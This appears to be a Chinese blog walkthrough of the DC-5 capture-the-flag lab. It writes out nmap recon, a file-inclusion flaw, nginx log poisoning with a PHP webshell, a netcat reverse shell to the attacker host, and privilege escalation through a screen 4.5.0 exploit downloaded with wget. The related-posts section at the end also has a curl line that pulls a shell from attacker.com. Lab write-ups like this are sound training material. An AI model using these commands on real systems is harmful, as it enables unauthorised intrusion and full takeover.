DC系列靶场---DC 5靶场的渗透测试

于 2024-08-06 09:00:00 发布
阅读量662 收藏 6
点赞数 15
分类专栏: DC系列靶场 文章标签: 服务器 linux 运维 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/140938335
版权

DC-5渗透测试

信息收集

地址探测

使用arp-scan对目标主机进行地址探测

arp-scan -l -I eth0

目标主机IP地址为172.30.1.132

Nmap扫描

使用Nmap对目标主机进行端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.132

//-sS  Nmap默认扫描类型,SYS的秘密扫描

//-sV  服务版本检测

//-T4  野蛮扫描(常用)

//-p-  对所有端口进行扫描

//-O   识别操作系统类型 (大O)

目标主机只开放了80端口,所以我们突破点就在80。

目录枚举

使用dirbuster进行目录枚举,dirbuster中自带有字典

选择Results-Tree Vlew模块可以到网站目录的架构

这里看到一个footer.php,这是一个网站页脚的程序文件。

还看到contact.php,这个是网站的留言板,也就是网站交互式的地方。

HTTP探测

在访问目标主机的网站没有思路时,可以看一下网站的架构

随便编写提交看一下有什么不一样的地方。

提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦

直接访问thankyou.php的效果也是一样的,也就是thinkyou.php调用了footer.php

形式为:http;//172.30.1.132/thanyou.php?file=footer.php

我们可以验证下一是否存在文件包含漏洞呢?

看到是可以看到目标主机的账户文件的。

漏洞查找及利用

文件包含

文件包含漏洞:

文件包含漏洞通常出现在编写糟糕的PHP web应用程序中,其中输入参数没有得到正确的处理或验证。

因此,攻击者很容易捕获传递的HTTP请求,操纵URL参数,该参数接受文件名并将恶意文件包含在web服务器中。

原理:

服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,

这是在Web开发时,代码常用的一种处理方法。

利用日志GET到SHELL

对根目录的请求包写入一句话木马,看到响应码是400,不用管

<?php system(&_GET['cmd']) ;?>

DC-5使用的是nginx,默认日志路径/var/log/nginx/access/log

写入后访问是可以看到的,如果看不到就是访问次数过多,日志文件可能满了。

我们可以通过&进行传参到CMD执行系统命令。

查看目标主机是否有nc,看到这里是有的。

/thankyou.php?file=/var/log/nginx/access.log&cmd=which nc

获取shell

使用nc获取shell

Kali主机做侦听

nc -lnvp 4444

目标主机主动连接kali

/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -nv 172.30.1.20 4444 -c /bin/bash

提权

信息收集

查看系统账户文件

cat /etc/passwd

没有什么有用的信息

查看SUID权限的文件

find / -perm -4000 -type f 2>/dev/null

这里有一个/bin/screen-4.5.0的文件。

使用searchsploit搜索提权漏洞

searchsploit screen 4.5.0

提权

将漏洞文件镜像到本地主机

searchsploit -m 41154

dos2unix命令用来将DOS格式的文本文件转换成UNIX格式的(DOS/MAC to UNIX text file format converter)。DOS下的文本文件是以\r\n作为断行标志的,表示成十六进制就是0D 0A。而Unix下的文本文件是以\n作为断行标志的,表示成十六进制就是0A。DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。而Unix格式的文本文件在Windows下用Notepad打开时会拼在一起显示。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。

run.sh格式转换,每个操作系统以字符表示结尾的时候是不同的,查看脚本文件若每行结尾为 ^M

则需要使用命令 dos2unix run.sh 将其转换一下

提权参考

cp 41154.sh run.sh

dos2unix run.sh

使用python搭建一个简易Web服务器

python -m http.server 5555

使用wget下载脚本文件

wget -c 172.30.1.20:5555/run.sh

给该脚本添加执行权

chmod 777 run.sh

运行脚本

www-data@dc-5:/tmp$ ./run.sh
./run.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

获取flag

总结

1、DC-5是存在文件包含漏洞,通常出现在PHP Web应用程序中。

2、文件包含漏洞存在的原因,输入参数没有得到正确的处理或验证。

3、文件包含漏洞的原理,服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件        (参数),另外一个文件中的PHP代码就会被执行。

4、通过文件包含漏洞可以查看Linux系统的敏感文件

5、文件包含分为两类:

本地文件包含(Local File Inclusion,LFI)当被包含的文件在服务器本地时,就形成本地文件包含


远程文件包含(Remote File Inclusion,RFI)当被包含的文件在第三方服务器时,叫做远程文件包含(前提:开启了PHP配置中的allow_url_fopen选项)

6、Nginx默认日志文件/var/log/nginx/access.log

7、文件包含漏洞:通过GET请求写入一句话木马 通过日志获取shell                                                查看系统SUID的权限,获得提权

8、PHP中文件包含函数有以下四种:

    require()

    require_once()

    include()

    include_once()

白帽子二三
关注
  • 15
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2713
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1813
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC系列靶场---DC 1靶场渗透测试(一)
zhouA0221的博客
07-17 1256
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1143
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
DC系列靶场---DC 2靶场渗透测试(一)
zhouA0221的博客
07-19 864
我们可以尝试远程连接,我们尝试一下这两个用户哪个可以通过SSH进行远程登录。用户是可以通过ssh进行远程连接的,但是端口号要指定为7744,因为我们通过nmap扫描到了7744端口为ssh服务。主要是因为管理员给tom用户限制了bash,我们可以通过环境变量看一下,我们tom用户可以使用哪些命令。我们可以看到这是一个WordPress的CMS,还可以看到一个Flag。我们在使用命令的时候发现不能执行,没有这个命令,还发现了一个-rbash。我们是可以使用vi的,所以我们通过vi这个命令来进行逃逸。
DC系列靶场---DC 2靶场渗透测试(二)
zhouA0221的博客
07-22 1331
虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/ 被允许的情况下;直接 /bin/sh 或 /bin/bash第二种情况:能够设置PATH或SHELL时。现在我们是符合第一种情况的所以我们直接使用/bin/sh 或者 /bin/bash现在我们就可以使用cat命令了,当然其他命令我们也是可以进行执行的。
DC系列靶场---DC 3靶场渗透测试(二)
zhouA0221的博客
07-29 747
5、提权流程表示系统发行版本和内核版本》找到匹配的版本exp》exp传输到目标主机》一般传输到tmp目录(临时文件),执行payload。表示系统发行版本和内核版本》找到匹配的版本exp》exp传输到目标主机》一般传输到tmp目录(临时文件),执行payload。使用wget进行下载(这里我们要访问kali的IP地址,因为我们是在kali中架设的)3、我们使用sqlmap注入时对数据库操作的顺序:数据库--表--字段--数据。4、在进行木马上传时,要先了解CMS的架构,知道我们上传木马的路径。
DC系列靶场---DC 3靶场渗透测试(一)
zhouA0221的博客
07-24 825
是一个开源的漏洞扫描器,‌主要用于自动化检测Joomla CMS的安全漏洞,‌以增强Joomla CMS开发的安全性。SQL注入攻击指的是通过构建特殊的SQL输入语句,传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。这里直接是可以看到sqlmap的执行语句,我们可以直接复制,改为目标主机的IP地址就可以。通过扫描我们看到这是Joomla 3.7.0的版本,找到了一个网站管理后台。
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1782
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
搭建pxe网络安装环境实现服务器自动部署(基于rhel7)
最新发布
m0_62989729的博客
08-05 296
init 5。
Openwrt配置ZeroTier,实现公网访问内网中服务器
低温热源的博客
08-05 349
​ZeroTier注册&Openwrt初始配置 首先来到Openwrt的VPN→ZeroTier页面,进行一个很简单的注册 注册后去zerotier的网页管理页面进行一个很简单的创建网络 复制网络ID备用 在openwrt填写网络ID并启用。如果你需要访问内网主机勾上 自动客户端NAT 在zerotier网络管理界面授权通过openwrt上的zerotier。 路由创建 初始化启动后可以在openwrt看到zerotier给你分配的IP,记下(授权有延迟,因此接口信息可能滞后显示。 防火墙设置
Linux手动编译方式安装httpd及配置系统服务(含不同安装方式简介)
shyuu的博客
08-04 726
Linux手动编译方式安装httpd及配置系统服务。包括几种软件安装方式的优缺点。手动编译安装方式相较其他方式有灵活性高、版本控制自由、依赖管理可控的优点等。
大宽带服务器有什么优势
athena1999的博客
08-05 300
从属性上看,大宽带可以分为G口大带宽、万兆大带宽等,从线路上看,可以分为电信、移动、联通等,从地域属性看,可以分为国内宽带、国际宽带。单位时间内能够在线路上传送的数据量,带宽越大,支持在线传送的数据量就越大。在用户访问高峰期时,如果网站没有足够的宽带提供,会出现网站卡顿的情况,加载速度慢,画质不清晰等情况,更严重的能会导致服务器瘫痪,使用大宽带可以完美规避这些。当下的网站内容大多由视频、音频、图片、文字构成,且数量也比较大,流量消耗也比就比较大,大宽带服务器可以很好的解决这点。大宽带服务器有什么优势。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值